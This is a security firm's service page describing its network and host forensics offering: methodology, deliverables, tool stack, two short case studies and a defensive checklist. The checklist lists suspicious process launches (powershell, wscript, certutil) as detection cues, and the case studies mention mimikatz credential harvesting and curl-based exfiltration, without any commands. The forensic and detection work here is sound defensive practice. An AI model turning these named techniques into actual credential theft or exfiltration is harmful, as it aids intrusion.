Digital Forensics & Incident Management

Network & Host Forensics

  • May 8, 2025
  • 0

Sherlocked Security – Network & Host Forensics

Uncover Breach Indicators, Analyze Digital Artifacts, and Trace Intrusions Across Network and Endpoint Systems

1. Statement of Work (SOW)

Service Name: Network & Host Forensics
Client Type: Enterprises, Incident Response Teams, MSSPs, Law Enforcement, Regulatory Investigators
Service Model: Incident-Based and Historical Artifact Analysis
Compliance Coverage: NIST 800-61, ISO/IEC 27035, PCI-DSS, HIPAA, GDPR, DFARS

Engagement Types:

  • Post-Incident Host and Network Triage
  • Evidence Recovery from Logs, Memory, and Artifacts
  • Forensic Timeline and Lateral Movement Analysis
  • Malware Propagation and Persistence Detection
  • Data Exfiltration & C2 Channel Reconstruction

2. Our Approach

[Evidence Collection] → [Chain-of-Custody Documentation] → [Disk & Memory Imaging] → [Network Log & PCAP Analysis] → [Timeline Reconstruction] → [Malware or Exploit Traceback] → [IOC Mapping & Reporting]

3. Methodology

[Triage & Asset Scoping] → [Forensic Acquisition of Systems] → [Disk & Memory Parsing] → [Artifact & Log Correlation] → [PCAP/DNS/Flow Analysis] → [Malicious Behavior Attribution] → [Threat Mapping & Report Creation]

4. Deliverables to the Client

  1. Host and Network Forensics Analysis Report
  2. Timeline of Events: Access, Execution, Exploitation
  3. Extracted Indicators of Compromise (IOCs)
  4. Disk and Memory Artifact Listings
  5. Network Traffic (PCAP) Analysis Summary
  6. Registry, Prefetch, and Event Log Forensics
  7. MITRE ATT&CK and Kill Chain Mapping
  8. Screenshots and Evidence Snapshots
  9. Advisory for Containment and Remediation

5. What We Need from You (Client Requirements)

  • Incident description and known compromised assets
  • Access to endpoints (or disk/memory images)
  • Access to firewall, VPN, and network device logs
  • PCAP or full packet captures (if available)
  • Antivirus/EDR alerts and telemetry
  • Whitelisting for forensic tools (if needed)

6. Tools & Technology Stack

  • Disk Forensics: FTK Imager, Autopsy, Sleuth Kit, X-Ways
  • Memory Forensics: Volatility3, Rekall
  • Network Forensics: Wireshark, Zeek, Suricata, NetworkMiner
  • Timeline Analysis: log2timeline (Plaso), Timesketch
  • Artifact Analysis: KAPE, AmCache Parser, ShellBags Explorer
  • Threat Intel: MISP, VirusTotal, AbuseIPDB, MITRE ATT&CK
  • Syslog & Log Sources: Sysmon, Event Logs, NetFlow, Firewall Logs

7. Engagement Lifecycle

1. Incident Intake & Scope Definition → 2. Asset Forensic Imaging → 3. Memory, Disk, and Log Analysis → 4. Network Traffic and Flow Correlation → 5. Behavior Attribution → 6. IOC Extraction → 7. Remediation Advisory & Report Delivery

8. Why Sherlocked Security?

Feature Sherlocked Advantage
Full-Scope Host & Network RE Unified analysis of logs, memory, PCAPs, and disk for context-rich findings
Tool-Agnostic Analysis Supports forensic imaging from major EDR and DFIR toolkits
Malware & Exploit Traceback Detects payloads, shellcode, and exploit kits from traces
Threat Attribution Maps TTPs to APT and crimeware groups via MITRE ATT&CK
Legal & Regulatory Alignment Chain-of-custody compliant, suitable for legal evidence submission

9. Real-World Case Studies

Financial Sector: Credential Dumping and Lateral Movement

Incident: SOC detected suspicious remote desktop sessions across finance department hosts.
Findings: Credential harvesting via mimikatz; lateral movement using SMB/WinRM.
Outcome: Timeline of compromise created, GPO lockdown and password reset enforced enterprise-wide.

Manufacturing Firm: Suspected Data Exfiltration via VPN

Incident: Abnormal outbound VPN traffic at night hours flagged by SIEM.
Action: Extracted PCAP, correlated with system logs. Identified ZIP exfil via curl & PowerShell.
Outcome: VPN session and API keys disabled, insider threat case opened with legal support.

10. SOP – Standard Operating Procedure

  1. Incident Details Intake & Threat Scope
  2. Asset Identification (Endpoints, Servers, Logs, PCAPs)
  3. Secure Forensic Image Acquisition (Disk & Memory)
  4. Volatility-based RAM Analysis (Process Tree, DLLs, NetConns)
  5. Disk Artifact Recovery (MFT, ShellBags, LNK, AmCache, JumpLists)
  6. Log Timeline Creation (Sysmon, Security, Application)
  7. Network PCAP Analysis (Flows, DNS, TLS fingerprints, Payloads)
  8. IOC Extraction & Threat Intelligence Enrichment
  9. Correlate Events with MITRE ATT&CK & Kill Chain
  10. Reporting, Containment Guidance, and Closure

11. Network & Host Forensics Technical Checklist

1. Host-Based Evidence Acquisition

  • Create forensic images with verified hashes (MD5/SHA256)
  • Acquire memory dumps using WinPMEM, DumpIt, LiME
  • Validate BIOS time and hardware clock for timestamp accuracy
  • Isolate compromised hosts from the network post-acquisition

2. Disk & File System Analysis

  • Parse:
    • $MFT (Master File Table)
    • $LogFile (NTFS journaling)
    • $USN Journal (change logs)
  • Recover deleted files, LNK artifacts, and volume shadow copies
  • Extract Shellbags, RecentDocs, AmCache, and JumpLists
  • Analyze execution artifacts from Prefetch, SRUM, WMI, Task Scheduler

3. Memory Analysis

  • Use Volatility to:
    • Extract active processes, loaded DLLs, network connections
    • Identify code injection or hollowing (e.g., svchost.exe anomalies)
    • Detect credential dumping via suspicious memory handles
    • Dump PE binaries from memory for reverse engineering

4. Log & Event Correlation

  • Collect:
    • Windows Event Logs (Security, System, App, PowerShell)
    • Sysmon Logs
    • VPN & Authentication Logs
  • Parse for:
    • Failed logins, privilege escalations, group changes
    • Suspicious process launches (e.g., powershell, wscript, certutil)
    • Task creation, service installation, and registry changes

5. Network Forensics

  • Analyze PCAPs with:
    • Wireshark for payload extraction
    • Zeek for connection metadata and DNS queries
    • Suricata for IDS alerts and protocol anomalies
  • Extract:
    • TLS certificate fingerprints
    • C2 beaconing patterns
    • Suspicious domains and rare destination IPs
  • Reconstruct:
    • File transfers (HTTP/FTP)
    • Credential leakage (e.g., Basic Auth, NTLM)

6. Timeline and TTP Mapping

  • Use Plaso/log2timeline to build unified timeline
  • Cross-reference memory, logs, and network data
  • Identify:
    • Initial access vector (phishing, RDP, drive-by)
    • Privilege escalation events
    • Persistence and lateral movement
  • Map actions to MITRE ATT&CK (T1055, T1021, T1047, T1086, etc.)

7. Threat Intelligence & Reporting

  • Enrich IOCs via:
    • VirusTotal, MISP, AbuseIPDB, WHOIS lookups
    • MITRE CTI mappings and threat group identifiers
  • Provide:
    • IOC list (IPs, domains, hashes, mutexes, registry keys)
    • Risk and impact summary
    • Containment and remediation playbook
    • PDF and structured IOC JSON exports
Malware Reverse Engineering
Ransomware Recovery Consulting